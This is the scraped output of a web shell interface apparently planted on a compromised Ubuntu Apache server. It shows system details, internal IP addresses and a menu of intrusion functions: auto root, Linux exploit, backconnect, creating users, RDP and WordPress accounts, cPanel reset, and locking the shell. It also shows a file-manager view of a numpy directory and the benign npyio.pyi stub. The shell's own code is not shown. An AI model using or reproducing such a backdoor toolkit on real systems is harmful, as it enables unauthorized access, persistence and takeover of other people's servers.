Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
__init__.py
1.74
KB
-rw-r--r--
__init__.pyi
5.19
KB
-rw-r--r--
_datasource.py
22.14
KB
-rw-r--r--
_iotools.py
30.21
KB
-rw-r--r--
_version.py
4.74
KB
-rw-r--r--
_version.pyi
701
B
-rw-r--r--
arraypad.py
30.49
KB
-rw-r--r--
arraypad.pyi
96
B
-rw-r--r--
arraysetops.py
25.86
KB
-rw-r--r--
arraysetops.pyi
496
B
-rw-r--r--
arrayterator.py
6.9
KB
-rw-r--r--
arrayterator.pyi
1.52
KB
-rw-r--r--
format.py
30.71
KB
-rw-r--r--
format.pyi
879
B
-rw-r--r--
function_base.py
158.21
KB
-rw-r--r--
function_base.pyi
1.94
KB
-rw-r--r--
histograms.py
39.27
KB
-rw-r--r--
histograms.pyi
280
B
-rw-r--r--
index_tricks.py
29.92
KB
-rw-r--r--
index_tricks.pyi
4.91
KB
-rw-r--r--
mixins.py
6.89
KB
-rw-r--r--
mixins.pyi
2.1
KB
-rw-r--r--
nanfunctions.py
57.76
KB
-rw-r--r--
nanfunctions.pyi
1.05
KB
-rw-r--r--
npyio.py
87.39
KB
-rw-r--r--
npyio.pyi
2.17
KB
-rw-r--r--
polynomial.py
42.79
KB
-rw-r--r--
polynomial.pyi
415
B
-rw-r--r--
recfunctions.py
55.2
KB
-rw-r--r--
scimath.py
14.53
KB
-rw-r--r--
scimath.pyi
212
B
-rw-r--r--
setup.py
405
B
-rw-r--r--
shape_base.py
37.47
KB
-rw-r--r--
shape_base.pyi
726
B
-rw-r--r--
stride_tricks.py
17.43
KB
-rw-r--r--
stride_tricks.pyi
510
B
-rw-r--r--
twodim_base.py
28.26
KB
-rw-r--r--
twodim_base.pyi
859
B
-rw-r--r--
type_check.py
20.29
KB
-rw-r--r--
type_check.pyi
461
B
-rw-r--r--
ufunclike.py
7.84
KB
-rw-r--r--
ufunclike.pyi
1.28
KB
-rw-r--r--
user_array.py
7.54
KB
-rw-r--r--
utils.py
32.36
KB
-rw-r--r--
utils.pyi
2.47
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : npyio.pyi
from typing import Mapping, List, Any from numpy import ( DataSource as DataSource, ) from numpy.core.multiarray import ( packbits as packbits, unpackbits as unpackbits, ) __all__: List[str] def loads(*args, **kwargs): ... class BagObj: def __init__(self, obj): ... def __getattribute__(self, key): ... def __dir__(self): ... def zipfile_factory(file, *args, **kwargs): ... class NpzFile(Mapping[Any, Any]): zip: Any fid: Any files: Any allow_pickle: Any pickle_kwargs: Any f: Any def __init__(self, fid, own_fid=..., allow_pickle=..., pickle_kwargs=...): ... def __enter__(self): ... def __exit__(self, exc_type, exc_value, traceback): ... def close(self): ... def __del__(self): ... def __iter__(self): ... def __len__(self): ... def __getitem__(self, key): ... def iteritems(self): ... def iterkeys(self): ... def load(file, mmap_mode=..., allow_pickle=..., fix_imports=..., encoding=...): ... def save(file, arr, allow_pickle=..., fix_imports=...): ... def savez(file, *args, **kwds): ... def savez_compressed(file, *args, **kwds): ... def loadtxt( fname, dtype=..., comments=..., delimiter=..., converters=..., skiprows=..., usecols=..., unpack=..., ndmin=..., encoding=..., max_rows=..., *, like=..., ): ... def savetxt( fname, X, fmt=..., delimiter=..., newline=..., header=..., footer=..., comments=..., encoding=..., ): ... def fromregex(file, regexp, dtype, encoding=...): ... def genfromtxt( fname, dtype=..., comments=..., delimiter=..., skip_header=..., skip_footer=..., converters=..., missing_values=..., filling_values=..., usecols=..., names=..., excludelist=..., deletechars=..., replace_space=..., autostrip=..., case_sensitive=..., defaultfmt=..., unpack=..., usemask=..., loose=..., invalid_raise=..., max_rows=..., encoding=..., *, like=..., ): ... def recfromtxt(fname, **kwargs): ... def recfromcsv(fname, **kwargs): ... # NOTE: Deprecated # def ndfromtxt(fname, **kwargs): ... # def mafromtxt(fname, **kwargs): ...
Close